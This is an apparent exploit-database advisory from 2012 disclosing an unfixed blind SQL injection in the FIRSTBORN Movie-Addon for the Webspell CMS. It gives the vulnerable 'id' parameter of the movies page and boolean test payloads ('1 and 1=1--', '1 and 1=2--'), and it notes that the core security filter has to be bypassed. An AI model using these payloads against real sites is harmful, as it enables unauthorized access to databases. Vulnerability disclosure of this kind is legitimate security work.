========================================================================================|# Title: Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability|# Author : Easy Laster|# Script : Webspell FIRSTBORN Movie-Addon|# Site : www.firstborn.de|# Price: free|# Exploitation : Remote Blind SQL Vulnerability|# Bug: Remote Blind SQL Vulnerability|# Date : 08.06.2012|# Language : PHP|# Status : vulnerable|# Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest======================Proof of Concept =================================[+] Introduction
FIRSTBORN Movie-Addon is a Addon for the Webspell Web Application for Content Management
System. In this Addon we found a Remote Blind SQL Injection vulnerability.The Movie fileis Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most
Webspell Webapplication has a Security System in the Webspell core self.You must bypass
the core from Webspell Security System (globalskiller).[+] Vulnerability
http://[host]/[path]/index.php?site=movies&action=show&id=[vul][+] Exploit
http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=1--+
http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=2--+[+] Fix
No fix.
